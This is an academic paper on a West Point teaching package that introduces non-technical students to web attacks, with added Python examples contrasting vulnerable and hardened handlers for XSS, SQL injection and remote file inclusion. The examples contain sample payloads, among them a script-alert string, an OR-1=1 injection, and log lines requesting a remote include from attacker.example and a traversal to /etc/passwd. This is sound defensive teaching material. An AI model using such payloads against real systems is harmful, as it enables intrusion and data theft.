A Capstone Design Project for Teaching Cybersecurity to Non-technical Users

Conference Paper · September 2016
DOI: 10.1145/2978192.2978216

All content following this page was uploaded by Edward Sobiesk on 10 August 2018.


A Capstone Design Project for
Teaching Cybersecurity to Non-technical Users
Tanya Estes, James Finocchiaro, Jean Blair, Johnathan Robison, Justin Dalme,
Michael Emana, Luke Jenkins, and Edward Sobiesk
United States Military Academy
West Point, New York 10996 USA
[Link]@[Link]

ABSTRACT and college students. The student-built Vulnerable Web Server


application is a system that packages instructional materials and
This paper presents a multi-year undergraduate computing pre-built virtual machines, created using Oracle VirtualBox, into
capstone project that holistically contributes to the development of interactive cybersecurity lessons. The lessons cover the following
cybersecurity knowledge and skills in non-computing high school topics: introduction to cyber, law/ethics, Linux, cross-site scripting,
and college students. We describe the student-built Vulnerable SQL injection, and remote file inclusion. Defensive techniques are
Web Server application, which is a system that packages covered throughout most lessons, and the three attack lessons also
instructional materials and pre-built virtual machines to provide include appropriate reconnaissance concepts. The lessons allow
lessons on cybersecurity to non-technical students. The Vulnerable non-technical students to quickly and safely experience a technical
Web Server learning materials have been piloted at several high but multi-disciplinary introduction to computer security that
schools and are now integrated into multiple security lessons in an captures their imagination. The Vulnerable Web Server materials
intermediate, general education information technology course at have been piloted at several high schools and are now integrated
the United States Military Academy. Our paper interweaves a into multiple security lessons in an intermediate, general education
description of the Vulnerable Web Server materials with the senior information technology course at the United States Military
capstone design process that allowed it to be built by undergraduate Academy.
information technology and computer science students, resulting in
a valuable capstone learning experience. Throughout the paper, a In 2001, Maconachy et al [17] published a seminal model for
call is made for greater emphasis on educating the non-technical information assurance (see Figure 1). In their paper, they describe
user. People as “the heart and soul of secure systems” and they state that
People “require awareness, literacy, training and education in
Categories and Subject Descriptors sound security practices in order for systems to be secured” [17].
K.6.m [Miscellaneous]: Despite this emphasis and need, properly training and educating
Security people appears to us to be one of the weakest aspects of modern
K.3.2 [Computer and Information Science Education]: society, and this weakness is especially prevalent among the
Information systems education, Computer science education, younger generation, for whom the use of information technology is
Computer literacy now almost ubiquitous.
K.4.2 [Social Issues]:
Abuse and crime involving computers

General Terms
Security, Management

Keywords
Cybersecurity education; cybersecurity general education; multi-
discipline cybersecurity education

1. INTRODUCTION
This paper presents a multi-year undergraduate computing
capstone project that holistically contributes to the development of
cybersecurity knowledge and skills in non-computing high school

This paper is authored by an employee(s) of the United States Government and is in


the public domain. Non-exclusive copying or redistribution is allowed, provided that Figure 1. Maconachy et al’s seminal model for information
the article citation is given and the authors and agency are clearly identified as its assurance [17].
source.
SIGITE'16, September 28-October 01, 2016, Boston, MA, USA Based on this motivation, the driving force of this project is to help
ACM 978-1-4503-4452-4/16/09 non-technical students gain interest and knowledge in computers
DOI: [Link]
and computer security by providing a unique resource and
experience. Vulnerable Web Server combines free software and
curriculum designed to be used by educators to teach the basics of

142
cybersecurity. We intend that this software will ultimately motivate and pedagogy for a culminating computing project and span topics
students to obtain degrees and jobs in cybersecurity – jobs that are that include technical skills, team work, and communication.
desperately required to meet the security needs of our Nation in the Several frameworks and documents also now exist providing
private sector, government, and military. We think any motivated competencies and goals for the cybersecurity work force across the
high school or college teacher can use the Vulnerable Web Server domains of the military, government, and private sector [23, 27,
software and curriculum with an existing computer lab classroom 28]. These frameworks are mostly focused on the cybersecurity
to teach and inspire students about basic cybersecurity concepts. professional, and not on the non-technical worker, student, or
A second important aspect of this work is to demonstrate an professional.
example of a computing capstone project that contributes to society Finally, the Damn Vulnerable Web Application (DVWA) [10] is
and to the profession while also focusing on the emerging topic of intermediate-to-advanced level software that teaches cybersecurity
cybersecurity. Development of the Vulnerable Web Server through the use of a dedicated computer or virtual machine (VM)
application took place over the past two years. The consecutive that provides a PHP/SQL application. A VM is able to effectively
student development teams consisted of senior-level information replicate a physical computer with some added benefits,
technology and computer science majors who were advised by particularly the ability to take a snapshot of the virtual machine.
faculty members from multiple computing and non-technical DVWA does not provide instructions for the setup of the VM.
disciplines. Instead, educators or students must utilize outside sources for a
2. RELATED WORK tutorial. Although the use of a virtual machine is optional for
Previous literature related to various aspects of the Vulnerable Web installing DVWA, we would not advocate installing DVWA on an
Server project is mixed and diverse. existing hardware operating system. Also, those not familiar with
VMs may find them more confusing than helpful. DVWA assumes
The most successful relevant initiatives involve extracurricular the user has a fairly strong knowledge of programming and web
cybersecurity competitions. For K-12, the CyberPatriot program technologies. DVWA does not provide a walkthrough or lesson
[8] now includes thousands of high school and middle school plan for their product, nor do they address ethical instruction.
teams, and the National Collegiate Cyber Defense Competition
[20] and National Cyber League [21] are providing similarly 3. CAPSTONE PROJECT BACKGROUND
positive impact at the college level. Programs such as these are One of the unique aspects of the Vulnerable Web Server package
extraordinarily important and deserve our strongest support. is that it was iteratively designed, built, and fielded by
However, these programs go beyond the non-technical user undergraduate information technology and computer science
(although they may allow the non-technical user to become a majors for their two-semester senior capstone design project. To
technical user). Our Vulnerable Web Server project does not provide some additional context on this, we will briefly present
compete against these programs, but rather supports and some background on this capstone experience, during which the
complements them by inspiring non-technical users to seek out and Vulnerable Web Server materials were constructed.
participate in competitive cyber environments. A two-semester team capstone project is the culminating
Several excellent papers and reports address needs for experience of our information technology and computer science
cybersecurity and computing education at the K-12 and college majors. These projects are completed during senior year by teams
levels. These works address various aspects of the topic such as of generally 3-6 students. Significant effort is made to have teams
what should be included in a college-level general education course consist of students from different disciplines, and all projects
devoted solely to cybersecurity [5, 19], how to integrate “cyber involve multi-disciplinary considerations. Each project has at least
throughout an institution’s entire curriculum including within the one faculty advisor, and students are required to seek out advisors
required general education program, cyber-related electives, cyber from different disciplines as needed. The projects often have
threads, cyber minors, cyber-related majors, and cyber enrichment external, real-world customers, and all projects require tangible
opportunities” [26], and what are some of the needs and solutions deliverables. Any software construction that is part of the project is
to cybersecurity (and computing) instruction at various levels of conducted using the agile development methodology, and
education [9, 12, 13, 16]. particular care is given to address both the technical and non-
Key articles and guidelines exist (and are continuing to be technical requirements of a project.
developed) that address the addition and integration of Some of the projects, including the Vulnerable Web Server,
cybersecurity to computing curricula, such as into the disciplines of continue for multiple years. This creates the added challenges and
computer science, information technology, and information opportunities of ensuring all artifacts are properly documented and
systems [1-4, 25]. In general, these works present cybersecurity preserved; any preliminary fielding results and insights are
best practices as well as knowledge, skills, and abilities that an consolidated for the next iteration; and that some sort of hand-off
undergraduate computing program should enable. occurs between the incoming and outgoing project teams. All
More narrowly, articles, initiatives, and guidelines now exist for an multi-year projects extend and improve on the project, they do not
undergraduate program(s) that specifically focuses on simply repeat the project.
cybersecurity [7, 18, 19, 22, 24]. This emerging field of study is The Vulnerable Web Server capstone project was particularly
formally developing curriculum guidelines under the purview of challenging from a requirements analysis perspective because there
the Association for Computing Machinery and the Institute of were so many different aspects to consider. As example, our
Electrical and Electronics Engineers, and accrediting bodies such students needed to consider a user to be both the non-technical high
as ABET are giving serious consideration to the development of school or college students who would take the lessons as well as
cybersecurity accreditation program criteria. the non-technical high school or college teacher who would teach
More generally, many fine works describe computing capstone them. Besides researching and implementing the virtual
projects [6, 11, 14, 15, 29, 30]. These papers cover best practices technologies, our students also had to become knowledgeable on
pedagogy as well as cybersecurity. Finally, they needed to ensure

143
that they gave prospective students the proper ethical, legal, and technical backgrounds before they got to the formal cybersecurity lessons.

4. VULNERABLE WEB SERVER (VWS)

4.1 VWS Overview

The software and curriculum of VWS is available as a free download from our website, [Link]. Prospective instructors are able to download the network setup guide, the required virtual machines (VMs), and the VWS curriculum. Instructors start by setting up the network. The network setup guide provides step-by-step instructions with screen shots on how to create a wireless network in the classroom, configure each of the physical machines, and establish the virtual machines, which include 17 client machines (Kali Linux 2.0) as well as the vulnerable web server itself (Ubuntu Desktop). VWS is composed of two phases, Building a Knowledge Base and Creating Understanding through Practical Exercises, both of which we will cover in more depth below. A diagram of the phases and respective lessons is shown in the VWS interface pictured in Figure 2. The selection of lessons for the VWS was inspired by the NICE framework [23].

Figure 2. The Vulnerable Web Server lesson interface.

As seen in Figure 2, the VWS materials are divided into multiple lesson topics, each of which is discussed in greater detail below.

4.1.1. Phase I: Building a Knowledge Base

The intent of Building a Knowledge Base is to better educate students on the cyber domain itself as well as provide them with (1) the basic skills that will allow them to complete the VWS practical exercises and (2) the legal / ethical foundation needed to safely study attack techniques.

4.1.1.1. Cyber Introduction

The Cyber Introduction lesson defines cyberspace and the operations that take place in it as well as providing an overview of the VWS content and the specific attacks covered in the materials. These include SQL injection, Cross-Site Scripting, and Remote File Inclusion. The Cyber Introduction lesson also covers how cyber operations affect all aspects of our lives, including personal security, organizational security, and military security. This lesson’s materials are presented in a 55 minute block of instruction that may include the use of multimedia tools, such as YouTube videos, that help explain basic concepts in a fun and engaging fashion. Overall, this lesson provides a global context for the entire program.

4.1.1.2. Ethics/Linux Introduction

This lesson includes a PowerPoint slide presentation that explains what a hacker is (black hat, white hat, and gray hat) as well as why organizations may use a white hat hacker to find weaknesses in a computing system in order to shore it up against possible exploitation by black hat hackers. Great care is taken to discuss the legal and ethical consequences of hacking a system without written consent and of taking on unauthorized privileges. The 1st, 2nd and 3rd order effects of actions are treated as well. Students additionally learn the best ways to protect their personal information when operating on the Internet.

Armed with a legal and ethical foundation relative to hacking, students then move into a block about the basics of Linux, introducing them to the operating system preferred by many cybersecurity professionals. Students are shown both Kali and Ubuntu home screens (Figure 3) and learn about the terminal and how to execute simple Linux commands. Time is also spent covering how a command-line interface compares to what is happening in a Graphical User Interface environment (Figure 4). These basic Linux skills will allow students to comfortably perform the exercises in Phase II.

Figure 3. VWS attacker and defender interfaces.

Figure 4. Graphical User Interface and Linux Terminals side-by-side.
4.1.2. Phase II: Creating Understanding through Practical Exercises

Creating Understanding through Practical Exercises is designed to allow students to go through hands-on tutorials of three categories of exploits: Cross-Site Scripting, SQL Injection, and Remote File Inclusion. Each of these lessons includes an introduction and information about the attack followed by a guided practical exercise that allows students to conduct reconnaissance to determine if a system is vulnerable to the attack, and then to conduct the exploit in a safe, air-gapped network environment.

4.1.2.1. Cross-Site Scripting

The Cross-Site Scripting (XSS) lesson presents to students the first of three exploit categories. They learn how to: set up basic HTML and PHP form pages; explain what an XSS is and how hackers use it; and generate a basic XSS attack. Students also learn some simple techniques to defend against XSS attacks. The attack lessons emphasize the practice of reconnaissance prior to any attack, and how hackers seek to determine the level of protection and vulnerabilities on a site (see Figure 5).

Figure 5. VWS explaining Cross-Site Scripting.

4.1.2.2. SQL Injection

Students next learn about SQL Injection. This lesson begins with a high level introduction to databases and data-driven applications as well as the language SQL. Four examples of how SQL injections have been used in the past are discussed to demonstrate the real-world dangers of this exploit. The lesson activity that accompanies this instruction has students conduct an SQL injection attack showing the need for database security measures.

4.1.2.3. Remote File Inclusion

This lesson begins with an explanation of Remote File Inclusion (RFI). Reconnaissance is again reinforced in this lesson by explaining how hackers find a site that is vulnerable to an RFI attack. The lesson emphasizes the dangers posed by remotely controlled executable files. Students learn how PHP vulnerabilities allow an attacker to gather victim information. This lesson also gives a good overview of Linux and LAMP services. As with all of the lessons in VWS, students are shown techniques to defend against the given attack.

4.2 VWS Fielding

Towards the end of each two-semester development cycle, the VWS materials were piloted at several high schools and one college. At the college, it is now the centerpiece in several security lessons in an intermediate, general education information technology course. Over the two years that these pilots were conducted, the capstone project teams gained real-world insights on various challenges involved in having a conceptual idea meet the reality of a classroom (see Figure 6 for pictures of this experience). The insights resulted in numerous VWS improvements and truly gave our students the opportunity to identify and account for user needs as well as to integrate IT-based solutions into a user environment.

Figure 6. Piloting the Vulnerable Web Server at high schools.

4.3 VWS Limitations

Although the VWS materials provide some great opportunities for students, there are currently still some limitations.

The current implementation of VWS is focused more towards educating students on offensive, as opposed to defensive, techniques. The goals of VWS are: (1) to capture the student’s imagination, (2) to inspire further study, and (3) to teach cybersecurity awareness and fundamentals. Based on these goals, as VWS evolved, design choices were made that supported ease of implementation involving attack demonstrations instead of solely defensive actions. We felt that demonstrating attacks is essential to capturing imagination and inspiring action. Current lessons include some defensive actions in the intro lesson and at the end of each attack lesson. Future lessons in VWS will include more defensive-focused actions.

Concern has sometimes been expressed that teaching high school students about hacking and specific computer exploits is risky. We had individuals tell us that high school students did not have the maturity to treat such dangerous information and skills with the proper respect. We disagree with these statements. We feel it is essential that younger students be exposed to the needed ethical foundation in the cyber domain as early as possible and in conjunction with learning some of the captivating attack techniques. The cyber ethics lesson also covers some of the laws regarding hacking so that students understand the potential consequences of their actions. VWS does teach some basic concepts and tools that could be used maliciously; however, these are all drawn from information that is already available on the Internet. Students will not be technical experts leaving this course. VWS compiles the information into one source so that educators can easily learn and then teach their students some basics of cybersecurity. We believe it is paramount for students to know and understand cybersecurity risks and vulnerabilities, whether they go on to become cybersecurity experts or just general users in the cyber domain.

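Each of the three attack lessons in Section 4.1.2 closes with defensive techniques, and Section 4.3 notes that the current materials lean toward attack demonstrations. The following worked example is added here and is not part of the VWS materials or the paper; it is written in Python rather than the PHP the lessons use, and every name, template and sample input in it is constructed. It pairs the cross-site scripting lesson's reflected form handler with its hardened form: the same template rendered once by pasting the submitted value straight into the HTML and once after escaping it, plus a small review check that counts tags the template did not put there.

```python
import html
import re

# Constructed inputs (not from the VWS materials): a benign name containing an
# apostrophe, and a value that carries markup.
BENIGN_NAME = "Cadet O'Neil"
MARKUP_NAME = "<script>alert('xss')</script>"

# The page reflects the submitted name twice: in text context and inside an attribute.
TEMPLATE = '<p>Hello, {name}!</p><input name="who" value="{name}">'
TAG_RE = re.compile(r"</?[A-Za-z]")
EXPECTED_TAGS = len(TAG_RE.findall(TEMPLATE))  # the three tags the template itself contains


def render_unsafe(name: str) -> str:
    """Vulnerable form handler: the submitted value is pasted into the HTML verbatim."""
    return TEMPLATE.format(name=name)


def render_safe(name: str) -> str:
    """Hardened handler: escape &, <, > and both quote characters before reflecting
    the value, so it is inert in both text and attribute context."""
    return TEMPLATE.format(name=html.escape(name, quote=True))


def injected_tag_count(page: str) -> int:
    """Review check: how many tags does the rendered page contain beyond those in the
    template? Any positive number means user input was interpreted as markup."""
    return len(TAG_RE.findall(page)) - EXPECTED_TAGS


def safe_response(name: str):
    """Escaped body plus a Content-Security-Policy header as a second layer: even if an
    escaping bug slips through elsewhere, the browser refuses inline script."""
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": "default-src 'self'; script-src 'self'",
    }
    return headers, render_safe(name)


if __name__ == "__main__":
    for name in (BENIGN_NAME, MARKUP_NAME):
        print("unsafe:", injected_tag_count(render_unsafe(name)), "extra tag(s)")
        print("safe:  ", injected_tag_count(render_safe(name)), "extra tag(s)")
```

The benign name is the reason escaping, not filtering, is the right fix: a filter that strips angle brackets would leave the apostrophe alone and still break an attribute delimited by single quotes, whereas `html.escape(..., quote=True)` neutralises every character that can change context. The CSP header is an assumed configuration for the example and is a defence-in-depth layer, not a replacement for output encoding.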
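The SQL injection lesson in Section 4.1.2.2 has students see why database security measures are needed; the following added example (not from the VWS materials, and using Python's built-in SQLite driver in place of the LAMP server's MySQL) shows the concatenated lookup beside its parameterized form on a constructed student table. A legitimate name containing an apostrophe breaks the concatenated query outright, which is both a correctness bug and the tell that the lesson's reconnaissance step looks for, while the parameterized query handles it and returns nothing for the quote-and-OR input.

```python
import sqlite3

# Constructed sample table (not from the VWS materials). A name with an apostrophe
# is included deliberately: legitimate data like this is what first breaks a
# concatenated query.
STUDENTS = [("Alice Park", "A"), ("Bob O'Brien", "B"), ("Chen Wei", "A")]


def make_db() -> sqlite3.Connection:
    """In-memory database standing in for the web server's database table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE students (name TEXT PRIMARY KEY, grade TEXT NOT NULL)")
    conn.executemany("INSERT INTO students VALUES (?, ?)", STUDENTS)
    conn.commit()
    return conn


def lookup_unsafe(conn: sqlite3.Connection, name: str) -> list:
    """Vulnerable lookup: the submitted text is spliced into the SQL statement, so a
    quote character in it changes the statement's structure."""
    sql = f"SELECT name, grade FROM students WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, name: str) -> list:
    """Hardened lookup: the '?' placeholder makes the driver pass the value separately
    from the statement; the database never parses it as SQL, whatever it contains."""
    return conn.execute(
        "SELECT name, grade FROM students WHERE name = ?", (name,)
    ).fetchall()


def probe(conn: sqlite3.Connection, lookup, name: str):
    """Run a lookup and return either its rows or the database error text it raised."""
    try:
        return lookup(conn, name)
    except sqlite3.Error as exc:
        return f"error: {exc}"


if __name__ == "__main__":
    db = make_db()
    for value in ("Alice Park", "Bob O'Brien", "x' OR '1'='1"):
        print(repr(value))
        print("  unsafe ->", probe(db, lookup_unsafe, value))
        print("  safe   ->", probe(db, lookup_safe, value))
```

Note that the two functions differ by one thing only: whether the value travels inside the SQL text or alongside it. That is the whole defence; escaping quotes by hand is the fragile alternative the parameter API exists to replace.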
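For the Remote File Inclusion lesson in Section 4.1.2.3, the following added example (not from the VWS materials; Python, with an assumed page directory and constructed log lines rather than the VWS VM's real paths or captures) contrasts an include resolver that trusts the request parameter with one that treats it only as a key into a fixed allow-list, and runs the same allow-list over sample web server log lines to flag requests that name a remote URL or try to leave the pages directory.

```python
from pathlib import PurePosixPath
from urllib.parse import parse_qs, urlsplit

# Assumed layout for this example (not the VWS VM's real paths). The allow-list is
# the only route from a request parameter to a file on disk.
PAGES_ROOT = PurePosixPath("/var/www/vws/pages")
ALLOWED_PAGES = {"home": "home.php", "about": "about.php", "contact": "contact.php"}

# Constructed Apache-style access-log lines (not real captures) for the check below.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Oct/2016:10:00:01 -0400] "GET /index.php?page=home HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Oct/2016:10:00:09 -0400] "GET /index.php?page=http://attacker.example/x.txt HTTP/1.1" 200 88',
    '10.0.0.9 - - [01/Oct/2016:10:00:14 -0400] "GET /index.php?page=../../etc/passwd HTTP/1.1" 200 1402',
]


def resolve_unsafe(page: str) -> str:
    """Mirror of include($_GET['page']): whatever the client sends is the include
    target, so a URL in the parameter makes the server fetch and run remote code."""
    return page


def resolve_safe(page: str):
    """Hardened resolver: the parameter is a key into a fixed map, never a path or URL.
    Unknown keys return None and the caller serves an error page instead."""
    target = ALLOWED_PAGES.get(page)
    return None if target is None else str(PAGES_ROOT / target)


def classify(page: str) -> str:
    """Label an include parameter for triage: 'remote' if it carries a URL scheme,
    'traversal' if it tries to leave the pages directory, otherwise 'local'."""
    if urlsplit(page).scheme:
        return "remote"
    if page.startswith("/") or ".." in PurePosixPath(page).parts:
        return "traversal"
    return "local"


def flag_requests(lines):
    """Scan access-log lines and report every 'page' value the allow-list would reject,
    with its classification. Returns (line_no, value, verdict) tuples."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        try:
            request_target = line.split('"')[1].split()[1]  # the path in "GET <path> HTTP/1.1"
        except IndexError:
            continue  # not a request line we understand
        for page in parse_qs(urlsplit(request_target).query).get("page", []):
            if resolve_safe(page) is None:
                findings.append((line_no, page, classify(page)))
    return findings


if __name__ == "__main__":
    for finding in flag_requests(SAMPLE_LOG):
        print("line %d: page=%r -> %s" % finding)
```

The allow-list removes the vulnerability regardless of what the parameter contains; `classify` exists only so that a reviewer reading the log can tell a remote include attempt from a traversal attempt. On the server side, PHP's `allow_url_include` directive (Off by default) is the configuration layer that refuses remote includes even when application code is wrong, and is worth checking on any lab VM.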
The final challenge with the current design of VWS is that students may have difficulty fielding these materials on their own. In preliminary versions of VWS, students had a vulnerable server installed on their computer which they could practice on. In the current VWS version, students do not have the vulnerable server installed on their computer. This is both a feature and a flaw. We do not advocate encouraging students to try this on their own without instructor (and ethical) supervision. Students learning outside of the classroom is beyond the scope of this project. Much outside-the-classroom material exists on the topic and is widely available on YouTube and other video sites. The VWS walkthrough manual provides links to outside sources which can instruct students, but exposure to this possibility is at the instructor’s discretion.

5. FUTURE WORK

Future updates to the VWS curriculum may include an introduction to scripting in Python, introduction to networking, introduction to social engineering, a separate lesson on cyber laws, specific lessons targeting defense, and a methodology for dynamically updating lesson materials based on evolving threats. We would like to field VWS to more classrooms in order to obtain further feedback to understand what high school teachers need, and how students learn with the VWS materials. Ultimately, this was not a project focused solely on pedagogy, but a project on packaging cybersecurity materials for secondary education and college general education in the United States.

6. CONCLUSION

Vulnerable Web Server provides packaged materials on computer security which can be taught by high school and college educators who have little experience with computers, networks, or cybersecurity. The curriculum includes several lessons with hands-on labs teaching some basics of cybersecurity. All VWS content is free of charge, and it builds on other open-source software. Schools must provide their own computer and network hardware. VWS allows schools to provide cybersecurity education and allows students to gain cybersecurity experience, hopefully generating further study, enthusiasm, and awareness. We believe the experience gained will encourage more students to study cybersecurity in the future and bring more technology professionals into the workforce to make our country’s national infrastructure more secure.

In addition to this work describing the contributions and capabilities of VWS, it also demonstrates an example of a senior capstone design experience that combines many of the best practices of previous capstone pedagogy to produce meaningful artifacts in the emerging cybersecurity domain. As we discussed in the introduction, the education of People must be a central aspect of any security system. This project allowed our students to see how much of a challenge accomplishing that education can be.

The views expressed in this paper are those of the authors and do not reflect the official policy or position of the United States Military Academy, the Department of the Army, the Department of Defense, or the United States Government.

7. REFERENCES

[1] ACM Inroads. March 2014. Volume 5, No. 1.
[2] ACM Inroads. June 2015. Volume 6, No. 2.
[3] Association for Computing Machinery and IEEE Computer Society. 2013. Computer Science Curricula 2013: Curriculum Guidelines for Undergraduate Degree Programs in Computer Science. [Link]
[4] Association for Computing Machinery and IEEE Computer Society. 2008. Information Technology 2008: Curriculum Guidelines for Undergraduate Degree Programs in Information Technology. [Link]
[5] Brown, C. et al. 2012. “Anatomy, Dissection, and Mechanics of an Introductory Cyber-Security Course’s Curriculum at the United States Naval Academy.” Proceedings of the ACM Conference on Innovation and Technology in Computer Science Education.
[6] Chard, S. and Lloyd, B. 2014. “The Evolution of Information Technology Capstone Projects into Research Projects.” Proceedings of the ACM Special Interest Group for Information Technology Education Conference.
[7] Cyber Education Project. 2016. [Link]
[8] CyberPatriot – The National Youth Cyber Education Program. 2016. [Link]
[9] Dutta, S., and Mathur, R. 2012. “Cybersecurity-An Integral Part of STEM.” Proceedings of the IEEE Integrated STEM Education Conference.
[10] DVWA. Accessed 2016. [Link]
[11] Fedoruk, A., Gong, M. and McCarthy, M. 2014. “Student Initiated Capstone Projects.” Proceedings of the ACM Special Interest Group for Information Technology Education Conference.
[12] Google. 2015. “Searching for Computer Science: Access and Barriers in U.S. K-12 Education.” [Link]computer-science_report.pdf.
[13] Google. 2014. “Women Who Choose Computer Science -- What Really Matters.” [Link]/us/edu/pdf/[Link].
[14] Hislop, G. et al. 2012. “Panel: Capstone Experiences for Information Technology.” Proceedings of the ACM Special Interest Group for Information Technology Education Conference.
[15] Jonas, M. 2014. “Capstone Experience – Achieving Success with an Undergraduate Research Group in Speech.” Proceedings of the ACM Special Interest Group for Information Technology Education Conference.
[16] Klaper, D. and Hovy, E. 2014. “A Taxonomy and a Knowledge Portal for Cybersecurity.” Proceedings of the 15th Annual International Conference on Digital Government Research.
[17] Maconachy, W. et al. 2001. “A Model for Information Assurance: An Integrated Approach.” Proceedings of the IEEE Workshop on Information Assurance and Security. [Link]
[18] McGettrick, A. et al. 2014. Panel: “Toward Curricular Guidelines for Cybersecurity.” Proceedings of the ACM Special Interest Group for Computer Science Education Conference.
[19] Military Academy CYBER Education Working Group. 2015. Draft Cyber Body of Knowledge. [Link]%20Draft%20Body%20of%[Link].
[20] National Collegiate Cyber Defense Competition. 2016. [Link]
[21] National Cyber League. 2016. [Link]
[22] National CyberWatch Center. 2016. [Link]
[23] National Initiative for Cybersecurity Education (NICE) Careers and Studies. Accessed 25 May 2015. National Cybersecurity Workforce Framework Version 2.0. [Link]workforce-framework-version-20.
[24] National Security Agency and the Department of Homeland Security National Centers of Academic Excellence in Information Assurance (IA)/Cyber Defense (CD). Accessed 2015. [Link]ml.
[25] Rowe, D., Lunt, B., and Ekstrom, J. 2011. “The Role of Cyber-Security in Information Technology Education.” Proceedings of the ACM Special Interest Group for Information Technology Education Conference.
[26] Sobiesk, E. et al. 2015. “Cyber Education: a Multilayer, Multidiscipline Approach.” Proceedings of the ACM Special Interest Group for Information Technology Education Conference.
[27] United States Department of Energy. Accessed 25 May 2015. Essential Body of Knowledge – A Competency and Functional Framework for Cyber Security Workforce Development. [Link]body-knowledge-ebk.
[28] United States Department of Labor. Accessed 25 May 2015. DRAFT Cybersecurity Competency Model. [Link]-models/[Link].
[29] Zhang, C. and Wang, J. A. 2011. “Performance on Successful IT Capstone Projects: A Case Study.” Proceedings of the ACM Special Interest Group for Information Technology Education Conference.
[30] Zheng, G., Zhang, C., and Li, L. 2015. “Practicing and Evaluating Soft Skills in IT Capstone Projects.” Proceedings of the ACM Special Interest Group for Information Technology Education Conference.